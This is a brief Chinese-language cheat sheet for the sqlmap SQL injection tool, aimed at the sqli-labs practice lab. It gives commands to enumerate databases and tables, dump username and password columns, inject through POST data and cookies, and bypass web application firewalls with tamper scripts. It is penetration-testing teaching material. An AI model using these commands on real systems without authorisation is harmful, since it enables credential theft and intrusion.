sqlmap是全面的注入工具
最简单形式
#Get
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" --batch
#爆数据库
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" --dbs
#爆表名
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" -D security --tables
#爆列名
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" -D security -T users --columns
#dump数据
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" -D security -T users -C id,username,password --dump
post,cookies
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-11/" --data="uname=admin&passwd=admin&submit=Submit" --cookie="XIc6_2132_saltkey=g5N5rRBz; SESS2a7db910cd5249ca3016afc519d2d9bf=OFwfZCCwgO8XF5bYygJsUNy__-kwXuDVk2birG42BVA" --batch
从文件中读取
最好用,(可以burpsuite抓包,保存到文件中如:in.txt)
python27 sqlmap.py -r in.txt --batch
指定参数
指定存在漏洞的参数,适合猜测或者手动分析过
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-11/" --data="uname=admin&passwd=admin&submit=Submit" -p passwd --batch
指定注入的方式
适合手动测试过,特别是sqlmap会优先用time-based而不是union select
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" --technique U --batch --dbs
#B, E, Q, S, T, U
指定注入位置
“ * “号指定注入的指定位置
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1*+--+" --batch
tamper绕过waf
tamper绕过waf,可以尝试使用不同的tamper来绕过waf,保存在tamper目录下
python27 sqlmap.py -u "http://hack.com/sqli-labs/Less-1/?id=1" --tamper=space2comment --batch
其他参数
可以直接sqlmap -h 或者 sqlmap -hh查看下,有需要可以尝试下
网友评论